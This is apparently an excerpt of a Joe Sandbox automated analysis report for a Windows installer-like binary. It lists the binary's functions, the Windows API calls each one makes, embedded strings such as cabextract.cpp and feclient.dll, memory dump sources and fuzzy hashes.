                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E0C2B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                                                                                                                                                  • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1970631241-3111339858
                                                                                                                                                                                                                                                                                                  • Opcode ID: 260633cdbab8539f5690540d694ada0c31f5bdf717efe8e551ca87147922d24b
                                                                                                                                                                                                                                                                                                  • Instruction ID: a7c9ec63547513fd73956cfa9bc091d5321214fc730e881b0e11d31ba4146b9f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 260633cdbab8539f5690540d694ada0c31f5bdf717efe8e551ca87147922d24b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6212376540205ABCB18CF9ED885DAA7BBAFF88320B255159FE08C7281E6B1DD40CB60
                                                                                                                                                                                                                                                                                                  Function 00600879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(?,00000008,?,005C53BD,00000000,?,?,?,?,?,?,?,005D769D,00000000), ref: 00600897
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,005D769D,00000000), ref: 006008A1
                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,005D769D,00000000), ref: 006008D3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,005D769D,00000000), ref: 006008EC
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,005D769D,00000000), ref: 0060092B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                                                                                                                                                                  • String ID: procutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4040495316-1178289305
                                                                                                                                                                                                                                                                                                  • Opcode ID: 6e226b63742d6a9c8a50d708d9e4f53b4a9805e3dddfad0ce58815269714011d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8721f7f4633795052b2f8059a79ba017d58da81c2701027a40ef84a5b30ecaf5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6e226b63742d6a9c8a50d708d9e4f53b4a9805e3dddfad0ce58815269714011d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E721A432D80229EBEB259B958805BDFBBA9FF10710F119166ED15AB390D3708E00DAD0
                                                                                                                                                                                                                                                                                                  Function 005E0C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 005E0CC4
                                                                                                                                                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005E0CD6
                                                                                                                                                                                                                                                                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 005E0CE9
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,005E08B1,?,?), ref: 005E0CF8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Invalid operation for this state., xrefs: 005E0C9D
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E0C93
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                                                                                                                                                  • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 609741386-1751360545
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0a77772bfc1d008c89c4740e44b83998db6e473d186313b8f9dc86df71262f65
                                                                                                                                                                                                                                                                                                  • Instruction ID: a2b14d18148062d0fa1ccb7600258f153cc89c662091c109a647304068477b91
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a77772bfc1d008c89c4740e44b83998db6e473d186313b8f9dc86df71262f65
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4621F37285121AABC7149FA9CD099FBBBBEFF043207549216F894D61D0D3B0EA91CB90
                                                                                                                                                                                                                                                                                                  Function 00603565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00603574
                                                                                                                                                                                                                                                                                                  • InterlockedIncrement.KERNEL32(0062B6C8), ref: 00603591
                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0062B6B8,?,?,?,?,?,?), ref: 006035AC
                                                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0062B6B8,?,?,?,?,?,?), ref: 006035B8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                                                                                                                                                                  • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                                                                                                                                                                  • API String ID: 2109125048-2356320334
                                                                                                                                                                                                                                                                                                  • Opcode ID: ffc5a19318aa7432821ebfc126af5de5162114cb18261f36eaec75618a05d4d9
                                                                                                                                                                                                                                                                                                  • Instruction ID: b5437147af809d3ac13487321d5e7aee86d99d9b3a548470183a7a3566235745
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffc5a19318aa7432821ebfc126af5de5162114cb18261f36eaec75618a05d4d9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FF065307C05369BD72A1B62BD09B572E6FDB81B56F153829F800D63F4D3A0DA418BB0
                                                                                                                                                                                                                                                                                                  Function 00604A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00604A9D
                                                                                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00604ACA
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00604AF6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0060B7A0,?,00000000,?,00000000,?,00000000), ref: 00604B34
                                                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00604B65
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1145190524-2967768451
                                                                                                                                                                                                                                                                                                  • Opcode ID: be64d58986c426076facfb8a0cdd0838fefae52deb4738e74e020a3a5bf7c743
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3367ca88f6c98801a93225c3f301d704aaa630bd2473dfba7d8f00f1f21ad9c3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be64d58986c426076facfb8a0cdd0838fefae52deb4738e74e020a3a5bf7c743
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF31E776EC0229ABD7259A998C41FAFBAAAAF44750F114155FE04E7381DB31DD0086E4
                                                                                                                                                                                                                                                                                                  Function 005DE956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 005DE985
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 005DE994
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?), ref: 005DE9A8
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 005DE9B8
                                                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 005DE9D2
                                                                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 005DEA31
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3812958022-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 682c91fefa945d708f54360bd219247fba3a377a715970133441602dbde4d164
                                                                                                                                                                                                                                                                                                  • Instruction ID: e25328658eb2af5c797129f02c530469f9bd34b085cc16a4f2b792e38ba7c2b3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 682c91fefa945d708f54360bd219247fba3a377a715970133441602dbde4d164
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8219031104105BFDB25AFA8DC4EE6B3F66FF85350F14861AFA0AAA2A4C731DD50DB51
                                                                                                                                                                                                                                                                                                  Function 005E0A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 005E0B27
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 005E0B31
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Invalid seek type., xrefs: 005E0ABD
                                                                                                                                                                                                                                                                                                  • Failed to move file pointer 0x%x bytes., xrefs: 005E0B62
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E0B55
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                  • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2976181284-417918914
                                                                                                                                                                                                                                                                                                  • Opcode ID: ff8d9a664d7ca1e151d57a736b049bee71b2a7158b1986cb72b514ab75ed0da8
                                                                                                                                                                                                                                                                                                  • Instruction ID: f371bd6b4d9876b8568e400254e1b1ec2abee370f7f4dd2de7977645fd080186
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff8d9a664d7ca1e151d57a736b049bee71b2a7158b1986cb72b514ab75ed0da8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1931E832A4025AEFCB18CF99CC44EAEBB79FF04724B048625FD5497290D370ED508B90
                                                                                                                                                                                                                                                                                                  Function 005C4115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,005DA0E8,00000000,00000000,?,00000000,005C53BD,00000000,?,?,005CD5B5,?), ref: 005C4123
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005DA0E8,00000000,00000000,?,00000000,005C53BD,00000000,?,?,005CD5B5,?,00000000,00000000), ref: 005C4131
                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,840F01E8,005C5489,?,005DA0E8,00000000,00000000,?,00000000,005C53BD,00000000,?,?,005CD5B5,?,00000000), ref: 005C419A
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005DA0E8,00000000,00000000,?,00000000,005C53BD,00000000,?,?,005CD5B5,?,00000000,00000000), ref: 005C41A4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: dirutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1375471231-2193988115
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9ec3da10ec941c37d0d4b64c0d51411121f673a3fd0667972101f34b5abc6382
                                                                                                                                                                                                                                                                                                  • Instruction ID: 69790e0b5c111f1f6e059527580db87159a79122baa8fdb1e23773ec96f40198
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ec3da10ec941c37d0d4b64c0d51411121f673a3fd0667972101f34b5abc6382
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98110236A407369ED7321AE58C64F3BAE55FF71B61F198029FD85EA240E3648C90DAD0
                                                                                                                                                                                                                                                                                                  Function 6D3709F8 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1366715162.000000006D361000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D360000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366691686.000000006D360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366786381.000000006D39B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366806926.000000006D39D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6d360000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3136044242-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a5fd6e60de7c9bd4b5511091c1c130294dc603f918f0eb406ffdc07d626d9e55
                                                                                                                                                                                                                                                                                                  • Instruction ID: 754a37f899acf1c302524611cf5a2e939c3fd536cd6888501e02e0c87986241a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5fd6e60de7c9bd4b5511091c1c130294dc603f918f0eb406ffdc07d626d9e55
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3219172D08A1AEFDBB18F56CC41E7F3A78EB80B94F018015F95467210C33B8D418BA4
                                                                                                                                                                                                                                                                                                  Function 6D366EF9 Relevance: 7.6, APIs: 5, Instructions: 68sleepprocessCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32 ref: 6D366F0A
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,00000104), ref: 6D366F22
                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 6D366FB7
                                                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE ref: 6D366FC3
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 6D366FCA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1366715162.000000006D361000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D360000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366691686.000000006D360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366786381.000000006D39B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366806926.000000006D39D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6d360000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ModuleProcess$CreateExitFileHandleNameSleep
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1732164044-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: cab0fb0c547de9e853cd40c3fb4199a3237ae89d14abbef03d05801e38aca94b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 56a64a16e49ea6f265e44cccb555d0fb404a89562bcf15c47a4382e278d77108
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cab0fb0c547de9e853cd40c3fb4199a3237ae89d14abbef03d05801e38aca94b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2321A2B2404158AACF11EFA8CD85FBB737CFB46785F0044AAF755EB094E77209548BA4
                                                                                                                                                                                                                                                                                                  Function 005D3AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0062AAA0,00000000,?,006057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00600F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,005D3FB5,feclient.dll,?,00000000,?,?,?,005C4B12), ref: 005D3B42
                                                                                                                                                                                                                                                                                                    • Part of subcall function 006010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0060112B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 006010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00601163
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                                                                                                  • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1586453840-3596319545
                                                                                                                                                                                                                                                                                                  • Opcode ID: c113559dd8a0ec3b96906c7a0fd2e5f8d9248222a297101df524b47c17698df3
                                                                                                                                                                                                                                                                                                  • Instruction ID: b52b0c557c8db99ceb9d887017d5513e20f95d06d93eaa32932540006df45b8d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c113559dd8a0ec3b96906c7a0fd2e5f8d9248222a297101df524b47c17698df3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2119336B41208BBEB31DA99DC82EBBBFB9FB10700F400067E501AB291D6719F81D711
                                                                                                                                                                                                                                                                                                  Function 00600764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(005E12CF,00000000,00000000,?,?,?,00600013,005E12CF,005E12CF,?,00000000,0000FDE9,?,005E12CF,8007139F,Invalid operation for this state.), ref: 00600776
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000200,00000000,00000000,?,00000000,?,?,00600013,005E12CF,005E12CF,?,00000000,0000FDE9,?,005E12CF,8007139F), ref: 006007B2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00600013,005E12CF,005E12CF,?,00000000,0000FDE9,?,005E12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 006007BC
                                                                                                                                                                                                                                                                                                  Strings
